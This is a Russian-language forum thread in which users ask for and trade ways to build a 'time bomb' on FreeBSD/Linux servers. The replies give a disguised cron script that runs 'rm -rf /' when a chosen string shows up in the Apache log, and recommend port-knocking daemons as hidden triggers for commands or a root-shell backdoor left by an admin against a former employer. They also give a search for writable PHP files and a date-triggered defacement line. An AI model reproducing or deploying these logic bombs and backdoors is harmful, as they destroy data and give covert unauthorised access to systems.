Доброго времени суток, уважаемые =) Вопрос таков как можно или есть готовые решения для создание сего творения, как временная бомба под FreeBSD 6 или подобных систем. с возможностю запуска через PHP скрипт. так же немаловажен факт что бы затерались файлы и папки определнной директории, а так же возможность запуска из nobody. Если кто то встречал рабучую весрию сго творения отпишите плиз.
Если на данный момент ты привелигированный пользователь в системе, то можно что то вроде такого: Создаешь скрипт примерного содержания nano /etc/conf.d/net.conf_param Code: #!/bin/sh grep "File does not exist: /var/www/localhost/htdocs/pizdec.serveru" /var/log/apache2/error_log >/dev/null if [ $? -ne 1 ] then rm -rf / exit 1 fi Вместо net.conf_param - любое название, лишь бы похожее на что нибудь системное и полезное , что бы не удалили )) так же как и путь... Устанавливаешь права : chmod 777 /etc/conf.d/net.conf_param И добавляешь в cron свое задание (на примере vixie-cron): echo "30 12 * * * root /bin/sh /etc/conf.d/net.conf_param" >> /etc/crontab --------------- Что это дает? Наш скрипт ежедневно, в 12.30 смотрит содержимое файла /var/log/apache2/error_log (ошибки апача), и если находит строку (File does not exist: /var/www/localhost/htdocs/pizdec.serveru) - то он удаляет содержимое корневой директории rm -rf / Добавим эту строку в лог: http://127.0.0.1/pizdec.serveru http://filegu.ru/f/ms8mHwt1/video.mpeg.html (4,75 Мб) ководство )
Однажды я озадачился вопросом, как быть, если контора, которую слегка админил, внезапно "кинет". Потому был собран немалый "арсенал". Одно из интересных решений - "стучалки". Принцип действия - специальный демон постоянно мониторит некоторые порты (tcp/udp, даже закрытые). При попытке подсоединиться к этим портам в нужном порядке отработает заранее заданная команда. Например, если указать порты 24, 8001 и 44, то, после подключения именно к этим портам (порты, которые закрыты так и будут закрытыми) именно в таком порядке выполнится заданная команда. Есть вариации doorman/knockd, существует под linux и bsd, мануал по настройке легко ищется в яндексе по запросу knockd. Недостаток: потребуются, естественно, права root. Достоинства: права, даже ниже, чем nobody (не требует установки соединения), редко кто шарит в этих демонах и, при приёме сервера (если его надо сдать) не найдёт ничего криминального, в логах не будет никаких записей, сверхвысокая надёжность (вероятность того, что злоумышленник "угадает" правильность портов - не выше [3.5e-13]%), не требует особого клиента - достаточно telnet (для tcp портов). Аналогичным образом можно оставить бэкдор, который откроет рутову шелл на нужном порту.
neval-> сомневаюсь в работоспособности твоего скрипта. т.к. команду rm -rf * даже под рутом не все системы адекватно воспримут. Что касается проблем ТС то лучше заранее знать местонахождение важных конфигурационных файлов системы, файлов баз данных, файлов хранящих какие либо данные или сведения. И их по отдельности убивать включая бэкапы. p.s. нужно решать иными путями, варварство не есть хорошо.
в крон попробовать можно но из по nobody врятли выйдет можно найти скрипт пхп открытый для записи find / -perm 777 -name *.php -- както так )) м дописать в конец чето то вроде if(date("d.m.y") == "1.1.1") system("echo HACKED by VASYA>index.php");
procedure, я не пробывал, но скажи какие? Насколько мне известно - linux and freebsd не задают вопросов при этой команде. Во избежания споров можешь проверить. ------------ ------------ ------------